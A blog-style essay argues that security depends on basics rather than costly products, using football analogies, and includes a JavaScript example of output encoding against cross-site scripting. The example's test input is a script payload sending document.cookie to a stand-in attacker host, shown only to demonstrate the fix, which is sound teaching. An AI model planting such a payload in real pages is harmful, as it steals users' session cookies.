One of the more common reasons organizations push back on spending for cyber security is the lack of a clear “return on investment.” All that fancy, shiny cyber-y stuff costs a lot of money without providing a benefit that is commensurate with the expenditure. Firewalls are expensive. IDS/IPS are expensive. SIEMs are expensive. Talent to run it all (if you can even find it) is expensive. Yet for all that expense the end result may still be a breach that costs millions of dollars, and the root cause of that breach is almost assuredly something so basic that it makes all that expense look like a waste, not an investment. Advancing cyber security starts with promulgating the message that, like most things in life, success is about the grind.
The Importance of Blocking and Tackling
A good, sound security capability can in fact be very pedestrian. Take some time to look at the CWE/SANS Top 25 Most Dangerous Software Errors lists (and the older SANS Top 20, which started life as a Top 10) going back several years. Do the same thing for the OWASP Top 10. If you look closely you’ll notice that while names may change, the basic problems do not. Buffer overflows and cross-site scripting are not “advanced” or “sophisticated,” but they work. All year, every year.
Addressing the most common security problems facing any enterprise does not require floor-to-ceiling displays showing maps of the world and stoplight charts and data flows from country to country. It doesn’t require a lot of software or hardware or subscriptions or licenses or feeds. The biggest problems are the most common ones that don’t necessarily require advanced skills or technology to resolve. You can harden your enterprise against the most likely and most dangerous problems without ever talking to a salesperson or worrying about how much you’re going to have to pay that guy with all the letters after his name.
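As an added example (not code from the original post), here is what the pedestrian fix for one of those perennial problems, cross-site scripting, actually looks like: encode untrusted output for the context it lands in. The comment-rendering scenario, the function names and the sample payload are assumptions constructed for illustration.

```javascript
// Added example (not from the original post): cross-site scripting is on every
// OWASP Top 10 because applications still paste untrusted text straight into
// HTML. The fix is fundamentals, not a product: encode output for its context.
// Function names, the comment scenario and the sample payload are constructed.

// Minimal HTML entity encoder, sufficient for text nodes and for values placed
// inside double-quoted attributes. Not sufficient for URL or JavaScript contexts.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: untrusted author and body are concatenated into markup unchanged.
function renderCommentUnsafe(author, body) {
  return `<div class="comment"><b>${author}</b>: ${body}</div>`;
}

// Hardened: every untrusted value is encoded before it touches the markup.
function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Crude check used only to make the difference visible: does the rendered
// markup still contain a raw (unencoded) tag with the given name?
function containsRawTag(html, tagName) {
  const re = new RegExp(`<\\s*/?\\s*${tagName}\\b`, "i");
  return re.test(html);
}

// Constructed sample input: a comment body carrying a classic cookie-stealing payload.
const SAMPLE_AUTHOR = "mallory";
const SAMPLE_BODY =
  '<script>new Image().src="https://attacker.example/?c=" + document.cookie</script>';

// Renders the same untrusted comment both ways and reports whether the
// injected <script> survived as live markup.
function demo() {
  const unsafe = renderCommentUnsafe(SAMPLE_AUTHOR, SAMPLE_BODY);
  const safe = renderCommentSafe(SAMPLE_AUTHOR, SAMPLE_BODY);
  return {
    unsafe,
    safe,
    unsafeHasScript: containsRawTag(unsafe, "script"), // true: payload executes
    safeHasScript: containsRawTag(safe, "script"),     // false: rendered as text
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

The hardened version uses nothing you have to buy: a ten-line encoder and the discipline to call it on every untrusted value, every time. Note that the encoder above only covers HTML text and quoted-attribute contexts; data that ends up in a URL, a `style` block or inline JavaScript needs the encoding rules for that context, which is exactly the kind of drill that separates teams that get burned by XSS every year from teams that do not.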
Are You Ready For Some Football?
It wouldn’t be fall without a football analogy, so here is the first one of the season: If you knew who Odell Beckham Jr. was before Lena Dunham did, you know where I’m going with this. If you didn’t, go to YouTube and enter his name, I’ll wait…..
Amazing plays are not the result of practicing acrobatics in full pads. Wide receivers don’t take contortionist classes. Training for football season at any level is about fundamentals: everyone doing the same drills, or variations on a theme, that they’ve done since they first put on a helmet. Why? Because the bulk of success on the field is attributable to fundamentals. Blocking and tackling. Plays that make the highlight reels are the result of individual athleticism, instincts, and drive, but no receiver gets into position to make the highlight reel without mastering the basics first.
A team of journeymen who are well versed in the basics alone may not make the playoffs, much less the Super Bowl, but that’s not the point; you want to avoid being beaten by the second string of the local community college. If you want to know how well buying expensive “solutions” to your problems works, I invite you to check out the drama that has been the Washington Redskins since 1999.
It’s About Perspective
You can’t read an article on cybersecurity without seeing the words “advanced” or “sophisticated,” either in the text or in the half-dozen ads around the story. Security companies cannot move product or get customers to renew subscriptions without promoting some level of fear, uncertainty and doubt. No product salesperson will bring up the fact that procuring the next-generation whatever they are selling is almost assuredly buying a castle to be built on a foundation of sand (to be fair: it’s not their job to revamp your security program).
This is not to say you ignore any class of threats, but you need to put it all into perspective. You don’t buy an alarm system for your house and then leave your doors and windows open. You do not spend more money on the car with the highest safety ratings and then roll out without wearing your seat belt. You don’t buy your kids bicycle helmets and then set them loose on the freeway. You do all the things that keep you and yours safe because to ignore the basics undermines the advanced. The same holds true in cyber security, and the sooner we put on our Carhartts and spend more sweat equity than we do cash, the sooner we are likely to see real improvements.